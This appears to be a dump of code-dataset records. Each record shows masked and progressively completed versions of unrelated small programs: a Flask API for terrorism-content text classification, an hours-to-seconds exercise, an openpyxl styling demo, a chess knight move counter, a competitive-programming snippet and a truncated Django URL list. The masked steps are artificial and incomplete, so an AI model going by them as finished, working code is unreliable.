"step-5": "# POST API for Red Alert project - NLP and Metalearning components\n# Insikt Intelligence S.L. 2019\n\nimport pandas as pd\nimport pickle\nfrom flask import Flask, render_template, request, jsonify\nfrom utilities import load_data, detect_language\nfrom preprocessing import preprocess, Tagger, remove_stopwords\nimport json\nfrom gensim.models import KeyedVectors\nfrom Embeddings import Embeddings, to_vector_single, to_vector_single_nonzeros\nimport numpy as np\nimport os\nfrom analysis import analyze\nfrom probability_terror import probability_terror\nfrom new_terms_no_lang import new_terms\nfrom classifier import classifier\nfrom claslisting import claslisting\nfrom audit import audit\n\napp = Flask(__name__)\n\nemb_dict = {\"en\": \"embedding-EN\", \"ar\": \"embedding-AR\", \"es\": \"embedding-ES\", \"ro\": \"embedding-RO\",\"fr\": \"embedding-FR\"}\n\[email protected]('/vectorize',methods=['POST'])\ndef make_vectorize():\n try:\n #Load the data\n data = request.get_json()\n\n except Exception as e:\n raise e\n\n if data == {}:\n return(bad_request())\n else:\n #Get the text and the language\n try:\n lang = data['lang']\n except:\n try:\n lang=detect_language(data['text'])\n print(lang) \n except: \n responses=jsonify(\"Error in vectorize: language field is missing\")\n return responses \n try:\n text = data['text']\n except:\n responses=jsonify(\"Error in vectorize: text is missing\")\n return responses \n \n if lang not in ['en','es','ar','ro','fr']:\n responses=jsonify(\"Language not available. Language must be in ['en','es','ar','ro','fr']\")\n return responses\n #Preprocess the text\n print(\"Vectorize...\")\n\n embeddings = Embeddings(emb_dict[lang])\n\n processed_text = preprocess(text)\n no_stpw_text = remove_stopwords(processed_text, lang)\n vectorized_tokens=to_vector_single_nonzeros(no_stpw_text, embeddings,len(no_stpw_text))\n\t\n if len(vectorized_tokens) > 0:\n vectorized_text = np.mean(vectorized_tokens, axis=0)\n else:\n vectorized_text =np.zeros((300,)*1)\n print(vectorized_text)\n \n #Send the response codes\n responses = jsonify(vector=vectorized_text.tolist())\n responses.status_code = 200\n return responses\n\n\[email protected]('/probability',methods=['POST'])\ndef make_probability():\n try:\n #Load the data\n data = request.get_json()\n\n except Exception as e:\n raise e\n\n if data == {}:\n return(bad_request())\n else:\n #Get the text,language and classifier\n try:\n lang = data['lang']\n except:\n try:\n lang=detect_language(data['text'])\n print(lang) \n except: \n responses=jsonify(\"Error in vectorize: language field is missing\")\n return responses \n try:\n text = data['text']\n except:\n responses=jsonify(\"Error in probability: text is missing\")\n return responses\n \n try:\n cls = data['classifier']\n except:\n responses=jsonify(\"Error in probability: classifier is missing\")\n return responses\n \n if lang not in ['en','es','ar','ro','fr']:\n responses=jsonify(\"Language not available. 
Language must be in ['en','es','ar','ro','fr']\")\n return responses\n \n \n #Preprocess the text\n print(\"Computing probability of having content related to \"+cls)\n\n probability = probability_terror(text,lang,cls)\n \n #Send the response codes\n responses = jsonify(probability=probability)\n responses.status_code = 200\n return responses\n\n\[email protected]('/analyze',methods=['POST'])\ndef make_analyze():\n\n try:\n #Load the data\n data = request.get_json()\n\n except Exception as e:\n raise e\n\n if data == {}:\n return(bad_request())\n else:\n\n #Get the text and the language\n\n try:\n lang = data['lang']\n except:\n try:\n lang=detect_language(data['text'])\n print(lang) \n except: \n responses=jsonify(\"Error in vectorize: language field is missing\")\n return responses \n try:\n text = data['text'] # we assume text is tokenized\n except:\n responses=jsonify(\"Error in analyze: text is missing\")\n return responses\n\n if lang not in ['en','es','ar','ro','fr']:\n responses=jsonify( message = \"Language not available. Language must be in ['en','es','ar','ro','fr']\")\n return responses\n \n \n filename = os.path.join(os.path.dirname(__file__), 'models-registry.json')\n registry = load_data(filename)\n\n analysis = analyze(text, lang, registry)\n #print(analysis[0])\n #Send the response codes\n responses = jsonify(concepts=analysis[0],key_ideas=analysis[1],topics=analysis[2])\n responses.status_code = 200\n return responses\n\n\[email protected]('/terms',methods=['POST'])\ndef make_terms():\n\n try:\n #Load the data\n data = request.get_json()\n\n except Exception as e:\n raise e\n\n if data == {}:\n return(bad_request())\n else:\n\n texts = data['dataset'] # we assume text is tokenized \n \n\t#Preprocess the text\n print(\"Suggesting new terms for search...\") \n terms=new_terms(texts)\n\t#print(terms)\n #Send the response codes\n responses = jsonify(message=\"Suggested new terms for search: \",terms= list(terms))\n responses.status_code = 200\n return responses\n\n\[email protected]('/sento',methods=['POST'])\ndef make_sento():\n\n try:\n #Load the data\n data = request.get_json()\n\n except Exception as e:\n raise e\n\n if data == {}:\n return(bad_request())\n else:\n\n #Get the text, language and classifier\n try:\n lang = data['lang']\n except:\n try:\n lang=detect_language(data['text'])\n print(lang) \n except: \n responses=jsonify(\"Error in vectorize: language field is missing\")\n return responses \n try:\n text = data['text']\n except:\n responses=jsonify(\"Error in sento: text is missing\")\n return responses \n try:\n cls = data['classifier']\n except:\n responses=jsonify(\"Error in sento: classifier is missing\")\n return responses\n\n if lang not in ['en','es','ar','ro','fr']:\n responses=jsonify(\"Language not available. 
Language must be in ['en','es','ar','ro','fr']\")\n return responses\n \n \n \n\t#Preprocess the text\n print(\"Sento analysis\") \n\n\n # Probability\n probability = probability_terror(text,lang,cls)\n print(probability)\n\n # Analyze\n filename = os.path.join(os.path.dirname(__file__), 'models-registry.json')\n registry = load_data(filename)\n\n analysis = analyze(text, lang, registry)\n \n data_audit={\"auditEventType\":\"Start task\",\"details\":{\"sento\":\"NLP analysis\"},\"principal\":\"Analyst\"}\n datajson=json.dumps(data_audit)\n results_audit=audit(datajson)\n\n\n #Send the response codes\n responses = jsonify(probability=probability,concepts=analysis[0],key_ideas=analysis[1],topics=analysis[2])\n responses.status_code = 200\n return responses\n\[email protected]('/classifier',methods=['POST'])\ndef make_classifier():\n try:\n #Load the data\n data = request.get_json()\n\n except Exception as e:\n raise e\n\n if data == {}:\n return(bad_request(\"There is no data for the training\"))\n else:\n #Get the text and the language\n try:\n lang = data['lang']\n except:\n try:\n lang=detect_language(data['text'])\n print(lang) \n except: \n responses=jsonify(\"Error in vectorize: language field is missing\")\n return responses\n try:\n annotated_data = data['annotated_data']\n except:\n responses=jsonify(\"Error in classifier: annotated data is missing\")\n return responses\n try:\n user_id=data['user_id']\n except:\n responses=jsonify(\"Error in classifier: user_id is missing\")\n return responses\n try: \n case_id=data['case_id']\n except:\n responses=jsonify(\"Error in classifier: case_id is missing\")\n return responses\n try: \n clas_name=data['clas_name']\n except:\n responses=jsonify(\"Error in classifier: classifier name is missing\")\n return responses\n\n print(len(annotated_data))\n if len(annotated_data) < 22:\n responses=jsonify( \"Training data set should have more than 10 samples per each class\")\n return responses\t\n\n if lang not in ['en','es','ar','ro','fr']:\n responses=jsonify(\"Language not available. Language must be in ['en','es','ar','ro','fr']\")\n return responses\n \n \n #Train the new classifier\n print(\"Training a new classifier from the user's annotated dataset \")\n\n accuracy=classifier(annotated_data,lang,user_id,case_id,clas_name)\n \n data_audit={\"auditEventType\":\"Start task\",\"details\":{\"classifier\":\"Trains a new classifier based on the annotations provided by the user\"},\"principal\":\"Analyst\"}\n datajson=json.dumps(data_audit)\n results_audit=audit(datajson)\n\n #Send the response codes\n responses = jsonify(message=\"Classifier has been saved. 
Accuracy given in % - calculated using C-10V\", accuracy=accuracy)\n responses.status_code = 200\n return responses\n\[email protected]('/claslisting',methods=['POST'])\ndef make_claslisting():\n user_id=None\n case_id=None\n try:\n #Load the data\n data = request.get_json()\n\n except Exception as e:\n raise e\n\n if data == {}:\n return(bad_request())\n else:\n try:\n user_id=data['user_id']\n except:\n responses=jsonify(message=\"Error in classifiers listing: user_id is missing\")\n return responses\n try:\n case_id=data['case_id']\n except:\n responses=jsonify(message=\"Error in classifiers listing: case_id is missing\")\n return responses\n \n available_classifiers=claslisting(user_id,case_id)\n \n data_audit={\"auditEventType\":\"Start task\",\"details\":{\"claslisting\":\"Lists the available classifiers\"},\"principal\":\"Analyst\"}\n datajson=json.dumps(data_audit)\n results_audit=audit(datajson)\n\n #Send the response codes\n responses = jsonify(available_classifiers=available_classifiers)\n responses.status_code = 200\n return responses\n \n\[email protected]('/my400')\ndef bad_request(msg=''):\n code = 400\n if msg=='':\n msg = 'Error'\n return msg, code\n\nif __name__ == '__main__':\n\n #app.run()\n app.run(host='0.0.0.0',port=5000)\n",
"step-ids": [
7,
8,
10,
11,
12
]
}
|
[
7,
8,
10,
11,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def how_many_seconds(hrs_int):
secs_int = None
    if hrs_int is not None and hrs_int > 0:
secs_int = hrs_int * 60 * 60
return secs_int
else:
raise TypeError('Invalid input type')
<|reserved_special_token_1|>
"""
CONVERT HOURS INTO SECONDS
Write a function that converts hours into seconds.
Examples:
- how_many_seconds(2) -> 7200
- how_many_seconds(10) -> 36000
- how_many_seconds(24) -> 86400
Notes:
 - 60 seconds in a minute; 60 minutes in an hour.
- Don't forget to return your answer.
"""
"""
U.P.E.R.
(A) UNDERSTAND:
- Objective:
- Write an algorithm that takes in a single input integer (representing a
given number of hours) and returns a single output (representing the
equivalent number of seconds).
- Expected Inputs:
- Number: 1
- Data Type: integer
- Variable Name: 'hrs_int'
- Expected Outputs:
- Number: 1
- Data Type: integer
- Variable Name: 'secs_int'
- My Examples:
- how_many_seconds(1) -> 3600
- 1 hr * (60 min/1 hr) * (60 sec/1 min) = 3600 secs
- how_many_seconds(5) -> 18000
- 5 hr * (60 min/1 hr) * (60 sec/1 min) = 18000 secs
- how_many_seconds(12) -> 43200
- 12 hr * (60 min/1 hr) * (60 sec/1 min) = 43200 secs
- Edge Cases & Constraints to Consider:
- Can the input be negative?
- No, because time is measured in positive units. The input must be greater than 0.
- Can the input be a floating point number?
- Yes, because the number of hours doesn't need to be whole in order
to find an equivalent number of seconds.
- Can the input be None?
- No, because you cannot convert 'None' number of hours.
(B) PLAN:
(1) Create a function that takes in a single given input, 'hrs_int', and returns a single output, 'secs_int'.
(2) Assign the value of 'None' to two new variables, 'mins_int' and 'secs_int'.
(3) Make sure that a conversion of hours to seconds will NOT occur unless the given input, 'hrs_int', is in fact of either "integer" or "float" data type.
(a) If the given input, 'hrs_int', is a valid argument, proceed with converting the given number of hours into an equivalent number of seconds.
i. Convert the number of hours in 'hrs_int' into an equivalent number of minutes and store that value in the previously declared 'mins_int' variable.
ii. Convert the number of minutes in 'mins_int' into an equivalent number of seconds and store that value in the previously declared 'secs_int' variable.
(b) If the given input, 'hrs_int', is an INVALID argument (i.e. - negative value, not of 'integer' or 'float' data types, null), handle the error with a 'TypeError' exception.
(4) Return the value of 'secs_int'.
"""
# (C) EXECUTE:
# def how_many_seconds(hrs_int):
# mins_int = None
# secs_int = None
# if hrs_int > 0 and hrs_int is not None:
# mins_int = hrs_int * 60 # converts given hours into minutes
# secs_int = mins_int * 60 # converts given minutes into seconds
# else:
# raise TypeError("Invalid input type")
# return secs_int
# (D) REFLECT/REFACTOR:
# Asymptotic Analysis:
# - Time Complexity = O(1)
# - Space Complexity = O(1)
# Can the brute force solution be optimized further?
# - Yes, but only by reducing the total number of lines of code and NOT by
# improving time/space complexity of the solution.
def how_many_seconds(hrs_int):
secs_int = None
    if hrs_int is not None and hrs_int > 0:
secs_int = hrs_int * 60 * 60 # converts given hours into seconds
return secs_int
else:
raise TypeError("Invalid input type")
|
flexible
|
{
"blob_id": "34c7e6b6bc687bc641b7e3b9c70fd0844af8e340",
"index": 8969,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef how_many_seconds(hrs_int):\n secs_int = None\n if hrs_int > 0 and hrs_int is not None:\n secs_int = hrs_int * 60 * 60\n return secs_int\n else:\n raise TypeError('Invalid input type')\n",
"step-3": "\"\"\"\nCONVERT HOURS INTO SECONDS\n\nWrite a function that converts hours into seconds.\n\nExamples:\n - how_many_seconds(2) -> 7200\n - how_many_seconds(10) -> 36000\n - how_many_seconds(24) -> 86400\n \nNotes:\n - 60 seconds in a minute; 60 minutes in a hour.\n - Don't forget to return your answer.\n\"\"\"\n\n\"\"\"\nU.P.E.R.\n\n(A) UNDERSTAND:\n - Objective:\n - Write an algorithm that takes in a single input integer (representing a\n given number of hours) and returns a single output (representing the \n equivalent number of seconds).\n \n - Expected Inputs:\n - Number: 1\n - Data Type: integer\n - Variable Name: 'hrs_int'\n \n - Expected Outputs:\n - Number: 1\n - Data Type: integer\n - Variable Name: 'secs_int'\n \n - My Examples:\n - how_many_seconds(1) -> 3600\n - 1 hr * (60 min/1 hr) * (60 sec/1 min) = 3600 secs\n - how_many_seconds(5) -> 18000\n - 5 hr * (60 min/1 hr) * (60 sec/1 min) = 18000 secs\n - how_many_seconds(12) -> 43200\n - 12 hr * (60 min/1 hr) * (60 sec/1 min) = 43200 secs\n\n - Edge Cases & Constraints to Consider:\n - Can the input be negative?\n - No, because time is measured in positive units. The input must be greater than 0.\n - Can the input be a floating point number?\n - Yes, because the number of hours doesn't need to be whole in order\n to find an equivalent number of seconds.\n - Can the input be None?\n - No, because you cannot convert 'None' number of hours.\n \n(B) PLAN:\n\n (1) Create a function that takes in a single given input, 'hrs_int', and returns a single output, 'secs_int'.\n \n (2) Assign the value of 'None' to two new variables, 'mins_int' and 'secs_int'.\n \n (3) Make sure that a conversion of hours to seconds will NOT occur unless the given input, 'hrs_int', is in fact of either \"integer\" or \"float\" data type.\n\n (a) If the given input, 'hrs_int', is a valid argument, proceed with converting the given number of hours into an equivalent number of seconds.\n \n i. Convert the number of hours in 'hrs_int' into an equivalent number of minutes and store that value in the previously declared 'mins_int' variable.\n \n ii. Convert the number of minutes in 'mins_int' into an equivalent number of seconds and store that value in the previously declared 'secs_int' variable.\n \n (b) If the given input, 'hrs_int', is an INVALID argument (i.e. - negative value, not of 'integer' or 'float' data types, null), handle the error with a 'TypeError' exception.\n \n (4) Return the value of 'secs_int'.\n\n\"\"\"\n\n# (C) EXECUTE:\n\n# def how_many_seconds(hrs_int):\n# mins_int = None\n# secs_int = None\n \n# if hrs_int > 0 and hrs_int is not None:\n# mins_int = hrs_int * 60 # converts given hours into minutes\n# secs_int = mins_int * 60 # converts given minutes into seconds\n# else: \n# raise TypeError(\"Invalid input type\")\n\n# return secs_int\n\n# (D) REFLECT/REFACTOR:\n\n# Asymptotic Analysis:\n# - Time Complexity = O(1)\n# - Space Complexity = O(1)\n\n# Can the brute force solution be optimized further?\n# - Yes, but only by reducing the total number of lines of code and NOT by\n# improving time/space complexity of the solution.\n\ndef how_many_seconds(hrs_int):\n secs_int = None\n \n if hrs_int > 0 and hrs_int is not None:\n secs_int = hrs_int * 60 * 60 # converts given hours into seconds\n return secs_int\n else: \n raise TypeError(\"Invalid input type\")",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# Import the basic workbook class
from openpyxl import Workbook
# Import the extended styling helpers
from openpyxl.styles import Font,Alignment,Border,Side,PatternFill,colors
# import openpyxl
def make_example():
    # Set the output file path
    addr = './example.xlsx'
    # Initialize the file and switch to the active worksheet
    work_book = Workbook()
    # To read an existing file instead, use:
    # work_book = openpyxl.load_workbook(addr)
    work_sheet = work_book.active
    # Assign a value to a cell directly
    work_sheet['A1'] = 'Hello World!'
    # Assign by row/column position (row 2, column 2)
    select_cell = work_sheet.cell(row=2,column=2,value='I select this cell')
    # Append two rows of data to the sheet
    work_sheet.append(['The quick brown fox',' jumps over ','a lazy dog.'])
    work_sheet.append(['The quick brown fox',' ',' jumps over ','a lazy dog.'])
    # Merge two cell ranges as a demonstration
    work_sheet.merge_cells('A3:B3')
    work_sheet.merge_cells('A4:B4')
    # Iterate over the sheet and read its data
    # Initialize the font (宋体 = SimSun)
    SIMSUN_20_BOLD = Font(name='宋体',size=12,bold=True)
    # Initialize the alignment template
    CENTER_ALIGN = Alignment(horizontal='center',vertical='center')
    # Initialize the border style
    LE,RI,TO,BO = [Side(style='thin',color='000000')]*4
    THIN_BORDER = Border(left=LE,right=RI,top=TO,bottom=BO)
    # Iterate over the sheet and apply the styles to every cell in the range
    for row in work_sheet['A1:D4']:
        for cell in row:
            # Apply the styles to the cell
            cell.font = SIMSUN_20_BOLD
            cell.alignment = CENTER_ALIGN
            cell.border = THIN_BORDER
            # print(cell.value)
    # Set row heights
    work_sheet.row_dimensions[1].height=15
    work_sheet.row_dimensions[2].height=20
    for row_letter in range(3,5,1):
        work_sheet.row_dimensions[row_letter].height=17
    # Set column widths
    for col_letter in ['A','B']:
        work_sheet.column_dimensions[col_letter].width=20
    work_sheet.column_dimensions['C'].width=17
    work_sheet.column_dimensions['D'].width=25
    # Set colors
    COLOR_MAP = ['ff9900','000000']
    COLOR_SIMSUN_20_BOLD = Font(name='宋体',size=12,bold=True,color=COLOR_MAP[0])
    BG_FILL = PatternFill('solid', fgColor=COLOR_MAP[1])
    work_sheet['A1'].font = COLOR_SIMSUN_20_BOLD
    work_sheet['A1'].fill = BG_FILL
    # Save to the configured addr
    work_book.save(addr)
if __name__ == "__main__":
    make_example()
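# Follow-up sketch (illustrative): reading the generated workbook back with
# openpyxl.load_workbook, as the commented-out line near the top hints; assumes
# make_example() has already written ./example.xlsx.
def read_example(addr='./example.xlsx'):
    import openpyxl
    work_book = openpyxl.load_workbook(addr)
    work_sheet = work_book.active
    # the styled 'Hello World!' cell written by make_example()
    return work_sheet['A1'].value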
|
normal
|
{
"blob_id": "d7524a455e62594e321b67f0a32a5c3a7437c1d6",
"index": 1093,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef make_example():\n addr = './example.xlsx'\n work_book = Workbook()\n work_sheet = work_book.active\n work_sheet['A1'] = 'Hello World!'\n select_cell = work_sheet.cell(row=2, column=2, value='I select this cell')\n work_sheet.append(['The quick brown fox', ' jumps over ', 'a lazy dog.'])\n work_sheet.append(['The quick brown fox', ' ', ' jumps over ',\n 'a lazy dog.'])\n work_sheet.merge_cells('A3:B3')\n work_sheet.merge_cells('A4:B4')\n SIMSUN_20_BOLD = Font(name='宋体', size=12, bold=True)\n CENTER_ALIGN = Alignment(horizontal='center', vertical='center')\n LE, RI, TO, BO = [Side(style='thin', color='000000')] * 4\n THIN_BORDER = Border(left=LE, right=RI, top=TO, bottom=BO)\n for row in work_sheet['A1:D4']:\n for cell in row:\n cell.font = SIMSUN_20_BOLD\n cell.alignment = CENTER_ALIGN\n cell.border = THIN_BORDER\n work_sheet.row_dimensions[1].height = 15\n work_sheet.row_dimensions[2].height = 20\n for row_letter in range(3, 5, 1):\n work_sheet.row_dimensions[row_letter].height = 17\n for col_letter in ['A', 'B']:\n work_sheet.column_dimensions[col_letter].width = 20\n work_sheet.column_dimensions['C'].width = 17\n work_sheet.column_dimensions['D'].width = 25\n COLOR_MAP = ['ff9900', '000000']\n COLOR_SIMSUN_20_BOLD = Font(name='宋体', size=12, bold=True, color=\n COLOR_MAP[0])\n BG_FILL = PatternFill('solid', fgColor=COLOR_MAP[1])\n work_sheet['A1'].font = COLOR_SIMSUN_20_BOLD\n work_sheet['A1'].fill = BG_FILL\n work_book.save(addr)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef make_example():\n addr = './example.xlsx'\n work_book = Workbook()\n work_sheet = work_book.active\n work_sheet['A1'] = 'Hello World!'\n select_cell = work_sheet.cell(row=2, column=2, value='I select this cell')\n work_sheet.append(['The quick brown fox', ' jumps over ', 'a lazy dog.'])\n work_sheet.append(['The quick brown fox', ' ', ' jumps over ',\n 'a lazy dog.'])\n work_sheet.merge_cells('A3:B3')\n work_sheet.merge_cells('A4:B4')\n SIMSUN_20_BOLD = Font(name='宋体', size=12, bold=True)\n CENTER_ALIGN = Alignment(horizontal='center', vertical='center')\n LE, RI, TO, BO = [Side(style='thin', color='000000')] * 4\n THIN_BORDER = Border(left=LE, right=RI, top=TO, bottom=BO)\n for row in work_sheet['A1:D4']:\n for cell in row:\n cell.font = SIMSUN_20_BOLD\n cell.alignment = CENTER_ALIGN\n cell.border = THIN_BORDER\n work_sheet.row_dimensions[1].height = 15\n work_sheet.row_dimensions[2].height = 20\n for row_letter in range(3, 5, 1):\n work_sheet.row_dimensions[row_letter].height = 17\n for col_letter in ['A', 'B']:\n work_sheet.column_dimensions[col_letter].width = 20\n work_sheet.column_dimensions['C'].width = 17\n work_sheet.column_dimensions['D'].width = 25\n COLOR_MAP = ['ff9900', '000000']\n COLOR_SIMSUN_20_BOLD = Font(name='宋体', size=12, bold=True, color=\n COLOR_MAP[0])\n BG_FILL = PatternFill('solid', fgColor=COLOR_MAP[1])\n work_sheet['A1'].font = COLOR_SIMSUN_20_BOLD\n work_sheet['A1'].fill = BG_FILL\n work_book.save(addr)\n\n\nif __name__ == '__main__':\n make_example()\n",
"step-4": "from openpyxl import Workbook\nfrom openpyxl.styles import Font, Alignment, Border, Side, PatternFill, colors\n\n\ndef make_example():\n addr = './example.xlsx'\n work_book = Workbook()\n work_sheet = work_book.active\n work_sheet['A1'] = 'Hello World!'\n select_cell = work_sheet.cell(row=2, column=2, value='I select this cell')\n work_sheet.append(['The quick brown fox', ' jumps over ', 'a lazy dog.'])\n work_sheet.append(['The quick brown fox', ' ', ' jumps over ',\n 'a lazy dog.'])\n work_sheet.merge_cells('A3:B3')\n work_sheet.merge_cells('A4:B4')\n SIMSUN_20_BOLD = Font(name='宋体', size=12, bold=True)\n CENTER_ALIGN = Alignment(horizontal='center', vertical='center')\n LE, RI, TO, BO = [Side(style='thin', color='000000')] * 4\n THIN_BORDER = Border(left=LE, right=RI, top=TO, bottom=BO)\n for row in work_sheet['A1:D4']:\n for cell in row:\n cell.font = SIMSUN_20_BOLD\n cell.alignment = CENTER_ALIGN\n cell.border = THIN_BORDER\n work_sheet.row_dimensions[1].height = 15\n work_sheet.row_dimensions[2].height = 20\n for row_letter in range(3, 5, 1):\n work_sheet.row_dimensions[row_letter].height = 17\n for col_letter in ['A', 'B']:\n work_sheet.column_dimensions[col_letter].width = 20\n work_sheet.column_dimensions['C'].width = 17\n work_sheet.column_dimensions['D'].width = 25\n COLOR_MAP = ['ff9900', '000000']\n COLOR_SIMSUN_20_BOLD = Font(name='宋体', size=12, bold=True, color=\n COLOR_MAP[0])\n BG_FILL = PatternFill('solid', fgColor=COLOR_MAP[1])\n work_sheet['A1'].font = COLOR_SIMSUN_20_BOLD\n work_sheet['A1'].fill = BG_FILL\n work_book.save(addr)\n\n\nif __name__ == '__main__':\n make_example()\n",
"step-5": "# 引入基础的工作表\r\nfrom openpyxl import Workbook \r\n# 引入增强的修改功能\r\nfrom openpyxl.styles import Font,Alignment,Border,Side,PatternFill,colors\r\n# import openpyxl\r\ndef make_example():\r\n # 设定文件目录\r\n addr = './example.xlsx'\r\n # 初始化文件,切换到活动的工作表\r\n work_book = Workbook()\r\n # 读取文件采用\r\n # work_book = openpyxl.load_workbook(addr)\r\n work_sheet = work_book.active\r\n # 直接对表格对象赋值\r\n work_sheet['A1'] = 'Hello World!'\r\n # 采用指定行列的方法赋值(第2行,第二列)\r\n select_cell = work_sheet.cell(row=2,column=2,value='I select this cell')\r\n # 添加两行数据到表格\r\n work_sheet.append(['The quick brown fox',' jumps over ','a lazy dog.'])\r\n work_sheet.append(['The quick brown fox',' ',' jumps over ','a lazy dog.'])\r\n # 合并两个单元格作为示范\r\n work_sheet.merge_cells('A3:B3')\r\n work_sheet.merge_cells('A4:B4')\r\n # 遍历表格,读取表格中的数据\r\n # 初始化字体\r\n SIMSUN_20_BOLD = Font(name='宋体',size=12,bold=True)\r\n # 初始化表格对齐模板\r\n CENTER_ALIGN = Alignment(horizontal='center',vertical='center')\r\n # 初始化表格边框样式\r\n LE,RI,TO,BO = [Side(style='thin',color='000000')]*4\r\n THIN_BORDER = Border(left=LE,right=RI,top=TO,bottom=BO)\r\n # 遍历表格,读取表格中的数据\r\n for row in work_sheet['A1:D4']:\r\n for cell in row:\r\n # 把样式赋值给表格\r\n cell.font = SIMSUN_20_BOLD\r\n cell.alignment = CENTER_ALIGN\r\n cell.border = THIN_BORDER\r\n # print(cell.value)\r\n # 设置行高\r\n work_sheet.row_dimensions[1].height=15\r\n work_sheet.row_dimensions[2].height=20\r\n for row_letter in range(3,5,1):\r\n work_sheet.row_dimensions[row_letter].height=17\r\n # 设置列宽\r\n for col_letter in ['A','B']:\r\n work_sheet.column_dimensions[col_letter].width=20\r\n work_sheet.column_dimensions['C'].width=17\r\n work_sheet.column_dimensions['D'].width=25\r\n # 设置颜色\r\n COLOR_MAP = ['ff9900','000000']\r\n COLOR_SIMSUN_20_BOLD = Font(name='宋体',size=12,bold=True,color=COLOR_MAP[0])\r\n BG_FILL = PatternFill('solid', fgColor=COLOR_MAP[1]) \r\n work_sheet['A1'].font = COLOR_SIMSUN_20_BOLD\r\n work_sheet['A1'].fill = BG_FILL\r\n # 保存到设定的addr\r\n work_book.save(addr)\r\n\r\nif __name__ == \"__main__\":\r\n make_example()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def chessKnight(cell):
pivot = "abcdefgh"
count = 8
for i in range(len(pivot)):
if cell[0] == pivot[i]:
vertical_4 , vertical_2 = False , False
if int(cell[1]) == 8 or int(cell[1]) == 1:
vertical_4 = True
count -= 4
elif int(cell[1]) == 7 or int(cell[1]) == 2:
vertical_2 = True
count -= 2
if i == 0 or i == 7:
if vertical_4:
count -= 2
elif vertical_2:
count -= 3
else:
count -= 4
elif i == 1 or i == 6:
if vertical_4:
count -= 1
else:
count -= 2
return count
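# Quick sanity checks (illustrative addition): a corner knight has only 2 legal
# moves, while a knight well inside the board keeps all 8.
if __name__ == '__main__':
    assert chessKnight('a1') == 2
    assert chessKnight('e4') == 8
    print('chessKnight sanity checks passed')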
|
normal
|
{
"blob_id": "c1335a8128ad4ba6ce6942e80f3c8b68a4210902",
"index": 6355,
"step-1": "<mask token>\n",
"step-2": "def chessKnight(cell):\n pivot = 'abcdefgh'\n count = 8\n for i in range(len(pivot)):\n if cell[0] == pivot[i]:\n vertical_4, vertical_2 = False, False\n if int(cell[1]) == 8 or int(cell[1]) == 1:\n vertical_4 = True\n count -= 4\n elif int(cell[1]) == 7 or int(cell[1]) == 2:\n vertical_2 = True\n count -= 2\n if i == 0 or i == 7:\n if vertical_4:\n count -= 2\n elif vertical_2:\n count -= 3\n else:\n count -= 4\n elif i == 1 or i == 6:\n if vertical_4:\n count -= 1\n else:\n count -= 2\n return count\n",
"step-3": "def chessKnight(cell):\n pivot = \"abcdefgh\"\n count = 8\n for i in range(len(pivot)):\n if cell[0] == pivot[i]:\n vertical_4 , vertical_2 = False , False\n if int(cell[1]) == 8 or int(cell[1]) == 1:\n vertical_4 = True\n count -= 4\n elif int(cell[1]) == 7 or int(cell[1]) == 2:\n vertical_2 = True\n count -= 2\n if i == 0 or i == 7:\n if vertical_4:\n count -= 2\n elif vertical_2:\n count -= 3\n else:\n count -= 4\n elif i == 1 or i == 6:\n if vertical_4:\n count -= 1\n else:\n count -= 2\n return count\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while t:
n = int(input())
a = list(map(int, input().split()))
a.sort(reverse=True)
s = 0
for i in range(n):
k = a[i] - i
if k >= 0:
s += k
print(s % 1000000007)
t -= 1
<|reserved_special_token_1|>
t = int(input())
while t:
n = int(input())
a = list(map(int, input().split()))
a.sort(reverse=True)
s = 0
for i in range(n):
k = a[i] - i
if k >= 0:
s += k
print(s % 1000000007)
t -= 1
<|reserved_special_token_1|>
# cook your dish here
t=int(input())
while t:
n=int(input())
a=list(map(int,input().split()))
a.sort(reverse=True)
s=0
for i in range(n):
k=a[i]-i
if k>=0:
s+=k
print(s%1000000007)
t-=1
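# Illustrative helper (added; the sample list is made up): the per-case logic above,
# restated without stdin. For a = [3, 1, 2] the descending order is [3, 2, 1], the
# kept terms max(a[i]-i, 0) are 3, 1 and 0, so the answer is 4.
def solve_case(a, mod=1000000007):
    a = sorted(a, reverse=True)
    return sum(max(v - i, 0) for i, v in enumerate(a)) % mod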
|
flexible
|
{
"blob_id": "44bf409d627a6029ab4c4f1fff99f102b8d57279",
"index": 3954,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile t:\n n = int(input())\n a = list(map(int, input().split()))\n a.sort(reverse=True)\n s = 0\n for i in range(n):\n k = a[i] - i\n if k >= 0:\n s += k\n print(s % 1000000007)\n t -= 1\n",
"step-3": "t = int(input())\nwhile t:\n n = int(input())\n a = list(map(int, input().split()))\n a.sort(reverse=True)\n s = 0\n for i in range(n):\n k = a[i] - i\n if k >= 0:\n s += k\n print(s % 1000000007)\n t -= 1\n",
"step-4": "# cook your dish here\nt=int(input())\nwhile t:\n n=int(input())\n a=list(map(int,input().split()))\n a.sort(reverse=True)\n s=0\n for i in range(n):\n k=a[i]-i\n if k>=0:\n s+=k\n print(s%1000000007)\n t-=1\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [url('^$', views.index_view, name='accounts.index'), url(
'^login/$', views.login_view, name='accounts.login'), url('^logout/$',
views.logout_view, name='accounts.logout'), url('^registro/$', views.
registro_usuario_view, name='accounts.registro'), url(
'obrigado/(?P<username>[\\w]+)/$', views.obrigado_view, name=
'accounts.obrigado'), url('^ataque/$', views.ataque_view, name=
'accounts.ataque'), url('^flpositivo/$', views.falsoLoginPositivo_view,
name='accounts.flpositivo'), url('^flnegativo/$', views.
falsoLoginNegativo_view, name='accounts.flnegativo')]
<|reserved_special_token_1|>
from django.conf.urls import url
from . import views
urlpatterns = [url('^$', views.index_view, name='accounts.index'), url(
'^login/$', views.login_view, name='accounts.login'), url('^logout/$',
views.logout_view, name='accounts.logout'), url('^registro/$', views.
registro_usuario_view, name='accounts.registro'), url(
